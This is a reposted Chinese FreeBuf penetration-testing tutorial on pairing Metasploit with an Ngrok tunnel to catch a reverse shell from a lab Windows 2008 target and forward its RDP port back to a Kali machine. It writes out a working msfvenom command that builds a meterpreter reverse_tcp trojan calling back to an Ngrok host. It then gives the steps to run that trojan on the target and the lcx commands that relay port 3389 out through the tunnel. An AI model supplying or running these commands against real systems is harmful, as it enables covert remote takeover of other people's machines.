专栏首页FreeBufMetaspolit下配合Ngrok同时实现内网反弹+转发

Metaspolit下配合Ngrok同时实现内网反弹+转发

相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Ngrok。但是我既想通过Ngrok在metaspolit下反弹shell,同时又想把对方的3389端口转发到本地,在meterperter下鱼和熊掌我都要!

Kali地址:192.168.61.130(攻击机地址) 靶机win2008: 192.168.61.134(模拟外网私人地址) 中间跳板ngrok :vipgz4.idcfengye.com 工具:lcx windows版与linux版

一、反弹shell到本地

1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)

2.在kali下构造生成反弹木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=vipgz4.idcfengye.com LPORT=10040 -f exe -a x86 --platform win -o gong32.exe

Lhost:为Ngrok服务地址

Lport:为Ngrok分配的隧道端口

3.在Kali中运行Ngrok的客户端:

./sunny clientid Ngrok的ID号

4.Kali攻击机配置监听:

此处的lhost与lport与Ngrok中的配置相同,并开始监听。

5.将生成的木马放到靶机运行:

成功得到通过中转反弹过来的shell。

PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。

二、转发3389端口到本地

1.在Kali中执行lcx监听和转发命令:

./portmap -m 2 -p1 8848 -p2 33891

P1为本地监听的端口(与ngrok转发的端口一致)

P2为本地转发的端口(随便命名,但不能是已被占用的端口)

2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令:

lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389

slave后跟Ngrok服务器地址与隧道端口+本地需要转发的端口

看到ngrok客户端多出回弹的消息

3.开始在Kali中连接远程桌面连接:

rdesktop 127.0.0.1:33891

至此我们已经成功连接上了3389远程桌面。由于全程都在一台本地kali环境中操作,且只用了一条Ngrok隧道大大减少了成本。

*本文作者:waowao,转载请注明来自FreeBuf.COM

本文分享自微信公众号 - FreeBuf(freebuf),作者:waowao

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-05-03

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Ngrok和树莓派绕过企业防火墙并访问内网主机实验

    绝大多数安全研究人员所面临的一个常见问题,就是如何在目标网络部署了严格的企业级防火墙或路由器时,如何访问目标企业网络内的办公计算机或者本地设备。在很多情况下,我...

    FB客服
  • 使用Egressbuster测试防火墙出站规则

    我已经使用Egressbuster有段时间了。从我的使用体验来讲Egressbuster非常的实用,因此我想在这里把它介绍给大家。 Egressbuster -...

    FB客服
  • 浅析无文件攻击

    在信息安全领域中,“无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时,不会在目标主机的磁盘上写入任何的恶意文件,因此而得名“无文件攻击...

    FB客服
  • 2018《医疗人工智能技术与应用白皮书》重磅发布

    2017年医疗人工智能发展迅速,产业格局风起云涌。人工智能(AI)在医疗领域中的应用已非常广泛,包括医学影像、临床决策支持、语音识别、药物挖掘、健康管理、病理学...

    钱塘数据
  • Python中利用Matplotlib绘制多图并合并展示

    大家好,最近在研究在搞Python的大作业,有个需求就是利用Matplotlib画几个像模像样的统计图然后合并在一张图中,因为此前很少用这方面的东西,所以折腾了...

    短短的路走走停停
  • python常用可视化技巧

    我们在对数据进行预处理时,常常需要对数据做一些可视化的工作,以便能更清晰的认识数据内部的规律。 这里我们以kaggle案例泰坦尼克问题的数据做一些常用的可视...

    机器学习AI算法工程
  • 人工智能名片,让销售在交流中创造更多价值!

    对于投资人,对于企业,对于销售者来讲,当市场中出现了人工智能名片,肯定是个很有利好的消息。毕竟,现在已经有不少人和不少企业都通过了人工智能名片来帮助到销售业绩快...

    用户1745481
  • 新兴技术领域中以用户为中心的设计的应用:VR 和 AR 等

    Android 开发者
  • Python学习笔记之Python的enumerate函数

    Python 的 enumerate() 函数就像是一个神秘的黑箱,你无法简单地用一句话来概括这个函数的作用与用法。

    Jetpropelledsnake21
  • matplot 同时绘制多个图形(一)

    matplotlib.pyplot中的subplot()函数可以用来在一张画布上绘制多个图形。

    用户6021899

扫码关注云+社区

领取腾讯云代金券